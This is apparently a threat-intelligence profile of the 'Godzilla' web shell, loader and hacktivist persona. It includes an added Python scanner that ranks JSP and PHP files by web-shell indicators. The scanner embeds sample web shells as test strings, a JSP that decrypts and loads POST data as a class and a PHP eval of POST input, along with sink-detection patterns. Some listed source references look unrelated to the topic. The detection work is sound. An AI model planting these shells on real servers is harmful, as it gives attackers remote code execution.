Godzilla

Malware Profile Updated 13 days ago
"Godzilla" is a name attached to more than one thing in the reporting this profile draws on: a web shell, an unrelated malware loader, and a hacktivist group persona. The name has been in circulation in the cybercrime landscape since at least 2018. The three are kept apart below.

Godzilla Web Shell. The web shell gives an attacker remote control of a compromised web server: it executes arbitrary commands, reads and manipulates databases and files, and serves as a foothold for further activity. It is post-exploitation tooling, deployed once a vulnerability in internet-facing software has been used to gain access rather than providing that access itself. The reporting referenced below describes it being delivered through an Apache ActiveMQ flaw, through Atlassian Confluence exploits that load the shell in memory instead of writing it to disk, and, on March 6, 2024, through a vulnerability in the WordPress plugin 3DPrint Lite (CVE-2021-4436). Because the shell is not the initial access vector, the practical response in each case is to patch the exploited product and then hunt for the dropped shell and its traffic.

Godzilla Loader. A separate intermediary loader, sold in underground forums, which obfuscates key elements of its binary. Payloads distributed by Godzilla Loader have been used in multiple campaigns to deliver other malware families including Dridex, Trickbot, and Panda Banker, and a domain associated with the loader was observed distributing InnaputRAT in late March 2018.

Godzilla (hacktivist persona). Following a significant incident, several hacktivist groups including Skynet, Godzilla, and Anonymous Sudan claimed responsibility. That "Godzilla" is a group name, not the web shell or the loader, which is why Anonymous Sudan appears among the associated threat actors further down this page.

Taken together, the name covers a persistent and evolving set of threats, and the web shell in particular continues to be deployed against widely used server software.
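The profile above describes what the web shell does but not how a defender would find one after an exploitation event. The following Python script is an added example, not code from this profile or from any vendor report it references: it scans a web root for server-side page files that combine a request-input source, a command-execution or dynamic class-loading sink, and an optional payload decoder, and ranks the hits for triage. The sample files are constructed here; shell.jsp mirrors the general shape of publicly available Java web shells that AES-decrypt the POST body and load the result with ClassLoader.defineClass, and its key string is a placeholder rather than an indicator taken from any incident. Function names, indicator lists and scoring are this example's own choices.

```python
"""Heuristic web-shell indicator scan over a web root. Added example, not Cybergeist code."""
from __future__ import annotations

import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# A file is flagged only when it combines a request-input SOURCE with an
# execution/class-loading SINK; a DECODER (crypto or base64 on the input) only
# raises the triage score, so a bare eval($_POST[...]) still trips the check.
SOURCES = {
    "jsp": [r"request\.getParameter\(", r"request\.getInputStream\(",
            r"request\.getReader\(", r"request\.getHeader\("],
    "php": [r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\[", r"php://input",
            r"\bgetallheaders\s*\("],
}
SINKS = {
    "jsp": [r"Runtime\.getRuntime\(\)\.exec\(", r"new ProcessBuilder\(",
            r"\.defineClass\(", r"ScriptEngineManager"],
    "php": [r"\beval\s*\(", r"\bsystem\s*\(", r"\bshell_exec\s*\(",
            r"\bpassthru\s*\(", r"\bassert\s*\(", r"\bproc_open\s*\("],
}
DECODERS = {
    "jsp": [r"javax\.crypto", r"Cipher\.getInstance\(", r"Base64\.getDecoder\("],
    "php": [r"\bbase64_decode\s*\(", r"\bgzinflate\s*\(", r"\bstr_rot13\s*\(",
            r"\bopenssl_decrypt\s*\("],
}
EXTENSIONS = {".jsp": "jsp", ".jspx": "jsp", ".php": "php", ".phtml": "php"}


@dataclass
class Finding:
    path: Path
    lang: str
    sources: list[str] = field(default_factory=list)
    sinks: list[str] = field(default_factory=list)
    decoders: list[str] = field(default_factory=list)

    @property
    def flagged(self) -> bool:
        return bool(self.sources and self.sinks)

    @property
    def score(self) -> int:
        # Sinks weigh most; decoders add weight only once the file is flagged.
        return 2 * len(self.sinks) + len(self.sources) + len(self.decoders) if self.flagged else 0


def _hits(patterns: list[str], text: str) -> list[str]:
    return [p for p in patterns if re.search(p, text)]


def scan_file(path: Path) -> Finding | None:
    """Return indicator hits for one page file, or None for non-page paths."""
    lang = EXTENSIONS.get(path.suffix.lower())
    if lang is None or not path.is_file():
        return None
    text = path.read_text(errors="replace")
    return Finding(path, lang, _hits(SOURCES[lang], text),
                   _hits(SINKS[lang], text), _hits(DECODERS[lang], text))


def scan_tree(root: Path) -> list[Finding]:
    """Scan every page file under root; highest-scoring findings first."""
    findings = [f for f in map(scan_file, sorted(root.rglob("*"))) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed samples. shell.jsp mirrors the shape of public Java web shells
# that AES-decrypt the POST body and load it via defineClass; the key is a
# placeholder, not an indicator from any incident.
SAMPLES = {
    "shell.jsp": """<%@ page import="javax.crypto.*,javax.crypto.spec.*" %>
<%! class U extends ClassLoader { U(ClassLoader c) { super(c); }
  public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } %>
<% String key = "0123456789abcdef";
byte[] data = new byte[request.getContentLength()];
request.getInputStream().read(data);
Cipher c = Cipher.getInstance("AES");
c.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key.getBytes(), "AES"));
new U(this.getClass().getClassLoader()).g(c.doFinal(data)).newInstance().equals(pageContext); %>
""",
    "hello.jsp": '<% String n = request.getParameter("name"); %>\n<p>Hello, <%= n %></p>\n',
    "shell.php": "<?php @eval($_POST['cmd']); ?>\n",
    "config.php": "<?php $cfg = json_decode(base64_decode($_SERVER['APP_CFG']), true);\n",
    "index.html": "<html><body>ok</body></html>\n",
}


def demo() -> dict[str, bool]:
    """Write the samples to a temp dir, scan it, and return file name -> flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in SAMPLES.items():
            (root / name).write_text(body)
        findings = scan_tree(root)
    for f in findings:
        print(f"{f.path.name:12} score={f.score} sinks={f.sinks} decoders={f.decoders}")
    return {f.path.name: f.flagged for f in findings}


if __name__ == "__main__":
    demo()
```

Against a real server, call scan_tree on the document root (for example scan_tree(Path("/var/www"))) and review the top of the list first; hello.jsp and config.php show why a source or a decoder alone is not treated as a hit. The check is file-based, so it finds nothing in the Confluence case from the references, where the shell is loaded in memory; that variant needs process or JVM telemetry rather than a disk scan.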
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
ID / Votes / Profile Description
Godzilla Web Shell (3 votes): The Godzilla Web Shell is a form of malware, designed to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites and can cause significant harm once inside. This includes stealing personal information, disrupting operations, or even holding data
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Web Shell
ActiveMQ
Vulnerability
Loader
Payload
Associated Malware
No associations to display
Associated Threat Actors
ID / Type / Votes / Profile Description
Anonymous Sudan (Unspecified, 2 votes): Anonymous Sudan, a threat actor group, has been identified as the malicious entity behind several notable Distributed Denial of Service (DDoS) attacks. A threat actor can be an individual, a private company, or part of a government entity that executes actions with malicious intent. Anonymous Sudan'
Associated Vulnerabilities
No associations to display
Source Document References
Information about the Godzilla Malware was read from the documents corpus below (display limited to 20 results).
Source / Created At / Title
CISA (a year ago): MAR-10400779-1.v1 – Zimbra 1 | CISA
Securityaffairs (4 months ago): Threat actors exploit Apache ActiveMQ flaw to deliver the Godzilla Web Shell
MITRE (a year ago): Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files | NETSCOUT
DARKReading (4 months ago): Godzilla Web Shell Attacks Stomp on Critical Apache ActiveMQ Flaw
CERT-EU (2 months ago): Hackers Exploit WordPress Plugin Flaw to Deploy Godzilla Web Shell
DARKReading (2 months ago): Stealth Bomber: Atlassian Confluence Exploits Drop Web Shells In-Memory
Securityaffairs (6 months ago): After ChatGPT, Anonymous Sudan took down Cloudflare website
Checkpoint (a year ago): Rhadamanthys: The “Everything Bagel” Infostealer - Check Point Research
CERT-EU (3 months ago): Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU (a year ago): Flea APT’s latest campaign targets foreign affairs ministries with new Graphican backdoor
CERT-EU (2 months ago): Technical Glitch Causes Global Disruption for Meta Users
CERT-EU (9 months ago): The Morning After: ‘GTA VI’ hacker leaked game footage with a Fire TV Stick | Engadget